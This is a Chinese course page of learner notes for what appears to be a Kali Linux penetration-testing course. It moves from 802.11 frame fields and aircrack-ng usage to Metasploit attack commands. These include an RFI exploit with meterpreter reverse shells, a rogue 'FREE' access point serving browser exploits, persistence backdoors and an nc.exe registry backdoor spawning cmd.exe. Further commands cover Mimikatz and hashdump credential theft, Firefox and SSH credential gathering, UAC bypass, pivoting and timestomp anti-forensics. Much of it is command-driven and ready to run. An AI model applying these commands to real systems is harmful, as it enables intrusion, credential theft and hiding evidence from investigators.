846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

airmon-ng 检测网卡驱动

airmon-ng check 检测是否会与套件有冲突

airmon-ng check kill 直接杀掉冲突的

airmon-ng start wlan2 启动侦听,把网卡置入混杂模式,可以在后面跟信道

airmon-ng stop wlan2 停止抓包,恢复原状

 

airodump-ng wlan2mon 置入hooping模式,在各个信道轮询么,发现每个信道的AP

airodump-ng wlan2mon -c 1 抓指定信道,多一列rxq,由于信道有重叠,可能抓到别的信道

--bssid 跟bssid,指定只抓跟某个AP的有关

-w 保存抓到的信息

--ivs 只抓wep中有ivs信息的包

BSSID AP的MAC地址

PWR 信号强度 -1的时候表示接受不了

RXQ 最近十秒成功接收的数据帧的百分比,有date内容的

beacons 接收到的此AP的beacons数量

#Data 抓到的数据帧数量。WEP表示IV数量,包括广播

#/s 最近十秒平均每秒抓到的帧的数量

CH 信道

MB AP支持的最大速率

ENC 采用的无线安全技术 WEP WPA WPA2 OPEN

CIPHER 采用的加密套件 CCMP TKIP WEP40 WEP104

AUTH 身份认证方法 MGT企业 PSK个人 SKA WEP共享密钥

ESSID 无线AP名称 隐藏的为空 显示长度

airodump 从 probe和 association request 来发现隐藏AP

STATION STA的MAC地址

LOST STA的丢包数量

Frame/Packets STA发送的数据包数量

Probes STA发送的 探测帧

 

 

[展开全文]

beacon frames

发包频率 1024ms 可变

时间单位 1024ms(毫秒)

SSID网络名

隐藏AP不发SSID广播

[展开全文]

More frag 1bit 表示是否还有后续帧

值为1时表示有后续,可能是Data或者Management帧类型。只有单播接受地址会被分段,广播不会分

Retry 1bit 重传

可能是Data或者Management帧

接受进程使用此值防止帧重复

Power Mgmt 1bit 控制供电模式

活动模式0 省电模式1

无线网卡放大器组件耗电大,

STA处于省电模式,向管联的AP发送该值为1的帧,AP不使用此字段,省电模式喜爱STA几乎不接受数据,发送给他的Data帧由AP暂时缓存

More Data 1bit

但AP缓存至少一个MSDU,会向省电模式的STA发送该值为1的帧,表示有数据要传给STA,接受此帧的STA唤醒自己并向AP发送PS-Poll帧,取回AP为其缓存的数据,也被用于AP有更多的广播/多播帧需要发送

Protected Frame 1bit

可能是Data或Management帧类型,表示MSDU是否被加密。也可能被用于表示PSK身份验证Frame#3帧,数据载荷为空,该位为0

Order 1bit

在非QoS帧的情况下,值为1表示数据必须严格顺序处理,通常为0

 

Duration / ID 16bit

所有Control帧都使用该字段,其作用随Type/SubType变化

帧类型为PS Poll(type:1,subtype:10)时,表示STA关联额AID

其他情况下该字段作为一种载波侦听机制,表示接受下一帧之前需要保持的时间间隔 NAV 单位是微秒

 

MAC Layer Address

BSSID是BSS的2层标志

 

Sequence Control 16bit 控制数据分段

这个字段包含两个子字段 Sequence Number 和 Fragment Numeber

Sequence Number是每个帧的编号,数值范围是0-4095,以1为步长递增,当帧被分段的时候,同一帧不同分段的该值相同

Fragment Number 是被分段的帧用于表示分段位置顺序的编号,数值范围是0-15,以1为步长递增

 

数据字段未加密的最大MSDU长度为2304字节(其中包含156字节上层头i信息,和可被传递的数据2048字节)

不同加密会增加的内容长度

WEP 8 bytes

TKIP(WPA1) 20 bytes

CCMP (WPA2) 16 bytes

 

FCS(Frame) 32bit 帧校验

发送端对MAC头和Frame Body内容进行CRC计算,计算结果即为FCS,接受端进行同样计算,结果不同就丢弃,广播和多播不会校验FCS

wireshark抓包已经删除了

 

子类型 0-6没有使用

 

 

Control Frame

type 为 1 没有数据段data

一些通知设备开始、停止传输或连接失败等情况的短消息

ACK

接收端接受数据后向发送端返回的确认

每个单播帧需要ACK立即确认,广播和组播不用确认

尽快响应,由硬件完成,而非驱动层

PS-POLL

RF系统的放大器

主要耗电的组件 发射前加大信号 几乎完全关闭,不是完全关闭

AID 关联ID

唤醒省电模式

 

[展开全文]
hl0rey · 2017-04-08 · CONTROL FRAME 0

首先要增加一个monitor网卡

iw dev wlan2 interface add wlan0mon type monitor

无线基于广播,不安全,monitor都能抓到

Radiotap头

一种事实标准,linux在驱动和内建api中都支持

传递额外信息,不同厂家的信息不一样,但是有一个基本的包头机构,长度不固定,不破坏802.11原始头结构,传递额外信息

分为Header和Data两部分

Header部分

revision(8bit)一直为0,pad(8bit)也是0 ,length(16bit)Radiotap头的长度,标记802.11包的开始,present (32bit)掩码,来表示接下来的数据位的掩码,最后一个位 ext,如果为1,则下面还有掩码(一般是厂家自定义的)MAC : timetamp datarate

 

DU(Data Unit)即数据单元,即信息传输的最小数据集合。

Encapsulation 传递过程逐层封装

SDU(service Data Unit)/PDC(Protocol Data Unit)

MSDU > MIC 分帧 添加IV(添加起始向量) 添加MAC头部 MPDU

MPDU/PSDU+物理头=PPDU > RF发射

802.11头部

MAC头部 30bytes 分为7段内容

Sequence Control 序号

Frame control 帧控

 protocol version 协议版本 2bit 可能为 0 1 2 3 不永远为0

type 帧类型 2bit 控制帧 1 数据帧 2 管理帧 0
 子类型还有很多

 

To DS/From DS 各1bit

不同组合,影响后边的四个地址的含义

[展开全文]
hl0rey · 2017-03-27 · RADIOTAP头部 0

qrcode 二维码

及时清理临时文件

[展开全文]

发现主机

扫描结果从别的工具导入

 使用bind_hidden的payload

设置允许链接的主机,平时侦听不打开,一旦有来自允许连接的主机的连接访问,则打开侦听

 

 

find attack 按照信息自动匹配exp

hail mary 尝试所有匹配的exp

 

socks代理

可以把自己变成代理服务器

让其他的主机来通过kali来攻击目标

script

扩展功能

catana脚本引擎

kali默认有一个

Veil-Evasion:/use/share/veil-evasion/tools/cortana/veil_evasion.cna

下载别的cortana脚本

https://github.com/rsmudge/cortana-scripts

[展开全文]

Armitage只是一个前端工具,调用msf的漏洞利用能力

据说模拟对抗比较适用

团队合作

客户端 Armitage

服务器 msfrpcd

团队成员资源共享

可脚本

单机启动方式

service postgresql start

团队方式

 /usr/share/armitage/

Teamserver得启动,直接用就行

teamserver IP地址 登录密码

发现目标

各种扫描

[展开全文]

开启远程包含

vi /etc/php5/cgi/php.ini  #php info
allow_url_fopen = On
allow_url_include = On

RFI 远程文件包含利用

use exploit/unix/webapp/php_include

set RHOST 1.1.1.2
set PATH /dvwa/vulnerabilities/fi/  存在文件包含的路径

set PHPURI /?page=XXpathXX 存在文件包含的页面(XXpathXX自动替换)

指定头信息,带上cookie

set HEADERS "Cookie:security=low;
PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"

设置payload

set payload php/meterpreter/reverse_tcp
set lhost 1.1.1.1

 

Karmetasploit 嗅探密码 截获数据 浏览器攻击

只是一个资源文件

先创造一个伪造AP

然后调用资源文件

基础架构配置 DHCP

 apt-get install isc-dhcp-server
 cat /etc/dhcp/dhcpd.conf
 option domain-name-servers 10.0.0.1;
 default-lease-time 60;
 max-lease-time 72;
 ddns-update-style none;
 authoritative;
 log-facility local7;
 subnet 10.0.0.0 netmask 255.255.255.0 {
 range 10.0.0.100 10.0.0.254;
 option routers 10.0.0.1;
 option domain-name-servers 10.0.0.1;
 }

伪造AP

airmon-ng start wlan0 #启动侦听模式
airbase-ng -P -C 30 -e "FREE" -v wlan0mon
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

建立dhcp租约文件

touch /var/lib/dhcp/dhcpd.leases

启动dhcp服务

dhcpd -cf /etc/dhcp/dhcpd.conf at0

启动karmetasploit

msfconsole -q -r karma.rc_.txt                                                                   

修改配置让受害者可以上网

vi karma.rc_.txt

删掉setg有关的参数

添加使用browser_autopwn2模块

检查恶意流量的模块

auxiliary/vsploit/malware/dns* 好几个模块,以dns开头的

 Mariposa 僵尸程序,该模块来查看,流量的流向,是否有访问CC端

zeus 僵尸程序

启动路由,iptables转发规则

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

[展开全文]

持久shell

run metsvc -A 再目标打开一个端口,创建一个服务,上传执行文件

不支持加密,不支持身份认证

连接目标

use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1

另外一种,默认使用反向连接

run persistence -h

延迟10秒启动,重启时自动反向连接

run persistence -X -i 10 -p 4444 -r 1.1.1.1

 

run persistence -U -i 20 -p 4444 -r 1.1.1.1
run persistence -S -i 20 -p 4444 -r 1.1.1.1

 

Mimikatz

获取  msv ssp tspkg livessp 身份认证方式的凭据

wdigest 、kerbers查询内存中明文的密码

mimikatz_command -f a:: 通过犯错来获取有哪些模块

mimikatz_command -f samdump::hashes 查看bootkey lm/ntlm hash
mimikatz_command -f handle::list 查看当前系统进程,也可以停
mimikatz_command -f service::list 查看有哪些服务,可以停

mimikatz_command -f crypto::listProviders 查看支持的加密套件

mimikatz_command -f winmine::infos 查看雷的信息,这是一个关于扫雷的模块 

 

PHP shell

java的也行,asp的也行

msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f
raw -o a.php

上传到服务器,用浏览器访问,msf侦听

Web Delivery

利用系统代码执行漏洞

use exploit/multi/script/web_delivery

 

 

[展开全文]

post 模块 取得shell之后使用的模块

set exitonsession false

获得shell之后继续侦听

通过jobs查看后台的shell

run post/windows/gather/arp_scanner RHOSTS=2.1.1.0/24 扫描网段

run post/windows/gather/checkvm 检查是不是虚拟机

run post/windows/gather/credentials/credential_collector 收集Token

run post/windows/gather/enum_applications 枚举安装的软件

run post/windows/gather/enum_logged_on_users 查看当前登录的id

run post/windows/gather/enum_snmp 枚举snmp

run post/multi/recon/local_exploit_suggester 侦查有哪些本地提权漏洞

run post/windows/manage/delete_user USERNAME=yuanfh

删除用户,但用户不会被自动注销

run post/multi/gather/env

获取目标详细信息

run post/multi/gather/firefox_creds

把火狐浏览器里保存的用户和密码

run post/multi/gather/ssh_creds

提取保存的ssh的密码密文,登录的证书

run post/multi/gather/check_malware

REMOTEFILE=c:\\a.exe

检查指定文件是不是恶意软件

自动执行脚本参数

最优先的那个

set InitialAutoRunScript migrate -n explorer.exe

自动运行post模块

获取最近打开的文件,前提要先迁移到目标用户帐号的进程

set AutoRunScript post/windows/gather/dumplinks

两个可以指定的位置

编辑目标的hosts文件

set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com

[展开全文]

Pivoting 跳板/枢纽/支点

meterpreter功能

利用路由功能

run autoroute -s 2.1.1.0/24

去往这个网段的,都通过跳板(已经或得的session)

对db_nmap不起作用,对msf里的模块有用

 

端口转发

   portfwd add -L LIP -l LPORT -r RIP -p RPORT
   portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
   portfwd list / delete / flush

[展开全文]

meterpreter在内存里运行

抓包

load sniffer

启动一个缓存区块来存储数据包(5000)

load sniffer
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap
/ sniffer_dump 2 1.cap

自动过滤meterpreter流量,全程使用 SSL/TLS加密

 

用msf解数据包

use auxiliary/sniffer/psnuffle

set PCAPFILE 1.cap

 

搜索文件

search -f *.ini

空格需要加转义符
search -d c:\\documents\ and\settings\\administrator\\desktop\\ -f *.docx

 

密码破解

获取hash,得有system权限,结果在tmp下

use post/windows/gather/hashdump

破解 John the Ripper

use auxiliary/analyze/jtr_crack_fast

自动调用tmp里的hash

 

文件系统访问会留下痕迹,电子取证重点关注

访问文件系统就如在雪地上行走

避免被电子取证发现,不要碰文件系统,meterpreter先天优势,完全基于内存

 MAC时间(Modified 修改/Accessed 最后访问查看时间/Changed 属性修改记录)

MACE:MFT entry 微软下有,mft的项

MFT:主文件分配表,通常在最前的分区,通常1024字节或两个硬盘扇区,其中存放多项entry信息,包含大量信息(大小 名称 目录位置 磁盘位置 创建时间)

 

查看

ls -l --time=atime/mtime/ctime 1.txt

stat 1.txt

修改时间

touch -d "2 days ago" 1.txt
touch -t 1501010101 1.txt

msf的修改工具

Timestomp (meterpreter)

timestomp -v 1.txt 查看

timestomp -f c:\\autoexec.bat 1.txt 从模板提取时间出了修改到目标

timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt 手动的修改某个时间 -m / -a / -c / -e / -z

-b 擦除MACE -r 递归一个目录,全部擦掉

 

[展开全文]

注册表修改不当,可直接系统崩溃

修改前备份注册表

某些修改是不可逆的

正版序列号存在注册表里

保存的帐号密码也在注册表里

 

修改、增加启动项

窃取存储于注册表的机密信息

绕过文件型病毒查杀

 

meterpreter

用注册表添加NC]后门

添加一个自动启动项

上传文件

    upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

枚举某主键下的键值

    reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

增加一个键值

    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
-d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'

查询

    reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -
v nc

 

打开防火墙端口

execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 "test" ENABLE ALL
shutdown -r -t 0
nc 1.1.1.1 4444

[展开全文]

local 模块都是基于一个已有的权限不够大的session

load priv 插件

提权插件

 

UAC会影响提权等操作

 

绕过UAC提权,前提获得的session是administrator权限

use exploit/windows/local/ask

每次执行操作的时候,都会在目标那询问,是否可以执行,挂载payload上去,然后利用已经有的session来执行,若目标点击是,则再获得一个shell,成功绕过UAC

use exploit/windows/local/bypassuac

利用已有session,直接绕过UAC

use exploit/windows/local/bypassuac_injection

通过一个dll来注入,来绕过UAC

 

利用漏洞直接提权为system,直接获得system的shell,也是利用已有的session,不论权限

use exploit/windows/local/ms13_053_schlamperei

失败

use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_rec

这个成了DoS了

use exploit/windows/local/ms13_081_track_popup_menu

图形化shell,但是无法操作

set payload windows/vncinject/reverse_tcp

改一个配置,生产可以操作的额shell

set viewonly no

viewonly 只看

[展开全文]

nmap 192.168.1.1 1-254-PU53 -SN

发现一个ip地址段,SN不做端口扫描,只做四层发现

pu代表扫描的端口号

 

nmap 192.168.1.1 -254-PA80 -SN

 

[展开全文]

提权

meterpreter

use priv
run post/windows/capture/keylog_recorder

tailf 跟踪查看文件

 

自动利用一些比较好的exploit,会根据来访问的客户端类型来自动选择payload

use auxiliary/server/browser_autopwn2

 

安卓后门

 

vba感染word、excel

[展开全文]

更改中文输入法

apt-get install ibus-pinyin

新版本的openvas安装有问题,,

[展开全文]

msf与漏洞扫描器的结合

本质是msf作为一个管理工具向openvas发送扫描参数

load插件或者导入openvas的nbe日志,nessus也是,nexpose是xml格式的

db_import

vulns 查看扫描到的弱点

直接调用nessus

nessus_connect 连接nessus

nessus_connect admin:password@127.0.0.1

nessus_policy_list 查看已经有的策略

nessus_scan_new

 

apt-get --download-only install  只下载

contrl

postinstall 安装完执行的脚本

[展开全文]

编写脚本发送icmp报文,探测主机系统版本信息

 

[展开全文]